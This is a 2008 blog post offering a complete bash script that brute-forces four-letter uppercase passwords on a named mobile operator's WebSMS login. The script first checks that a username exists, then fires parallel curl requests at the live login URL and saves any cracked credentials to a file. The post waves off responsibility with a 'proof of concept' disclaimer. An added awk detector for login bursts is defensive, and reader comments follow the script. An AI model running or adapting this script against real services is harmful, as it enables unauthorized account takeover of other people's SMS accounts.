Sep 16, 2008

Bash script: Crack Dhiraagu WebSMS passwords

Some time ago I posted an article about how ridiculously insecure the webSMS site was, and how relatively simple it was for somebody to write up a bash script to possibly crack the default passwords.

For lack of something better to post about, I'm releasing the 5-minute bash script that I wrote as a proof-of-concept (for myself mostly). The following code is released on a ZERO LIABILITY basis. Which means, I am in no way responsible for your actions. It's proof-of-concept code and is NOT intended to be used. Educational purposes only. I will not be held responsible for any claims or charges of damages, negligence, cyber-crime etc and YOU automatically agree to this if you continue reading beyond this point. As such, I will not be giving you instructions or assistance regarding it. Thank you for your co-operation :)

EDIT: It seems some people didn't get the message when I said I won't provide any support for this. Let me clarify, DO NOT ASK ME HOW TO USE IT!

#!/bin/bash

cd $HOME/Desktop
mxjobs=15
cont=0

if [ -z ${2} ]
then
cont=1
else
cont=0
fi

echo "checking if username exists"

if [ -n "`curl -s --compressed -d \"username=${1}&password=wroXngo123!@)\" \
http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl | \
grep \"password is incorrect\"`" ]
then
echo "User exists. Let's see what happens."
else
echo "That username does not exist."
exit
fi

for a in {A..Z};do for b in {A..Z};do for c in {A..Z};do for d in {A..Z}
do
f="${a}${b}${c}${d}"

if [ $cont -lt 1 ]
then
echo -en "skipping ${a}${b}${c}${d}\r"

if [ "${f}" = "${2}" ]
then
echo
echo "MATCH"
cont=1
fi
continue
fi

ok=0
while [ $ok -lt 1 ]
do
if [ `ps -A | grep curl | wc -l` -lt $mxjobs ]
then
ok=1
fi
done

echo -en "Testing ${f}\r"

if [ -n "`curl -s --compressed -d \"username=${1}&password=${f}\" \
http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl | grep Dear`" ];then \
echo "Found ${1},${f}" | tee -a foundpasses.txt;killall curl;kill ${$};fi&

done;done;done;done

echo "I guess we didn't find it then"
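
The script above relies on the login form tolerating 15 parallel guesses with no lockout while it walks a four-letter uppercase keyspace (26^4 = 456,976 candidates). As an added example, not part of the original post, here is a sliding-window detector a site operator could run over a login log to catch that pattern. The log format, window, threshold and sample lines are all assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: flag usernames hit by a burst of failed logins.
# Assumed log format (constructed): <epoch> <source_ip> <username> <OK|FAIL>

WINDOW=60      # sliding window in seconds (assumed value)
THRESHOLD=5    # failures inside WINDOW that raise an alert (assumed value)

detect_bruteforce() {
    awk -v window="$WINDOW" -v threshold="$THRESHOLD" '
    $4 == "FAIL" {
        user = $3
        tail[user]++
        ts[user, tail[user]] = $1
        if (!(user in head)) head[user] = 1
        # Drop failures that have aged out of the window.
        while ($1 - ts[user, head[user]] > window) head[user]++
        n = tail[user] - head[user] + 1
        # Alert once per username when the threshold is first crossed.
        if (n >= threshold && !(user in flagged)) {
            flagged[user] = 1
            printf "ALERT user=%s failures=%d window_start=%s last_src=%s\n",
                   user, n, ts[user, head[user]], $2
        }
    }'
}

# Constructed sample: one account guessed rapidly, one user who simply
# mistyped a password twice and then logged in.
sample_log() {
    cat <<'EOF'
1221550000 203.0.113.7 7770001 FAIL
1221550001 203.0.113.7 7770001 FAIL
1221550001 198.51.100.4 7770002 FAIL
1221550002 203.0.113.7 7770001 FAIL
1221550002 203.0.113.7 7770001 FAIL
1221550003 203.0.113.7 7770001 FAIL
1221550004 203.0.113.7 7770001 FAIL
1221550090 198.51.100.4 7770002 FAIL
1221550200 198.51.100.4 7770002 OK
EOF
}

sample_log | detect_bruteforce
```

The same counter, enforced in the login handler rather than in log review, is what turns the alert into a lockout or a forced delay between attempts.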

4 Comments:

Anonymous said...

WOT?

Anonymous said...

which language is this 1, java script?

Unknown said...

how to get the web sms password........

Unknown said...

i have forgot the user name!.....
